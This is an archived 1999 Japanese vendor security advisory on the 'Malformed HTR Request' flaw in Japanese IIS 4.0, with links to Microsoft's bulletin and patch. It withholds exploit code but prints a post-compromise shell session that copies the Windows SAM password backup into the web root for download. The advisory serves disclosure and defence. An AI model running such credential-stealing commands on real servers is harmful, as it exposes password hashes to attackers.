アーカイブ

"Malformed HTR Request" Vulnerability in IIS 4.0 Japanese Version

1999年6月25日　|　注意喚起

SNS Advisory No.1

概要

弊社SNSチームは、日本語版IIS4.0上で"Malformed HTR Request" Vulnerabilityの再現に成功しました。インターネット上で公開されたクラッキング方法では、日本語版IIS4.0を停止させるのみでしたが、日本語版IIS4.0に対しても任意のプログラムを感染可能である事を確認いたしました。

この脆弱性についての再現デモンストレーションは弊社開催のセミナ等で行う予定です。なお、このクラッキング方法についてソースコード、実行ファイルの公開は一切予定しておりません。

実行例

C:＼>
C:＼>ipconfig <--ipconfig の実行
ipconfig

Windows NT IP Configuration

Ethernet adapter E100B1:

IP Address. . . . . . . . . . . . . . .
:
172.16.99.99

Subnet Mask . . . . . . . . . . . . .
:
255.255.0.0

Default Gateway . . . . . . . . . .
:
　

C:＼>
C:＼>route print <-- route print の実行
route print
============================================================
Interface List
0x1 ........................................... MS TCP Loopback interface
0x2 ...00 90 27 44 c5 fd ...... Intel(R) PRO PCI Adapter
============================================================
============================================================
Active Routes:

Network Destination	Netmask	Gateway	Interface	Metric
127.0.0.0	255.0.0.0	127.0.0.1	127.0.0.1	1
127.16.0.0	255.255.0.0	172.16.99.99	172.16.99.99	1
172.16.99.99	255.255.255.255	127.0.0.1	127.0.0.1	1
172.16.255.255	255.255.255.255	172.16.99.99	172.16.99.99	1
224.0.0.0	224.0.0.0	172.16.99.99	172.16.99.99	1
255.255.255.255	255.255.255.255	172.16.99.99	172.16.99.99	1

D:＼>net start "World Wide Web Publishing Service" <--Web サーバー起動
net start "World Wide Web Publishing Service"
World Wide Web Publishing Service ｻｰﾋﾞｽを開始します.
World Wide Web Publishing Service ｻｰﾋﾞｽは正常に開始されました。

D:＼>
D:＼>cd inetpub＼wwwroot
cd inetpub＼wwwroot

D:＼Inetpub＼wwwroot>
D:＼Inetpub＼wwwroot>copy d:＼winnt＼repair＼sam._ .
copy d:＼winnt＼repair＼sam._ .
1 個のファイルをコピーしました。

ブラウザで「 sam._ 」にアクセスすることにより、ファイルを取得することが可能。

この例は日本語版IIS4.0が動作しているコンピュータに簡易telnetサーバを感染させた例を示しています。

該当するMicrosoftのSecurity Bulletins：

http://www.microsoft.com/security/bulletins/ms99-019.asp

日本語パッチ：

ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/jpn/ext-fix/

アーカイブ一覧に戻る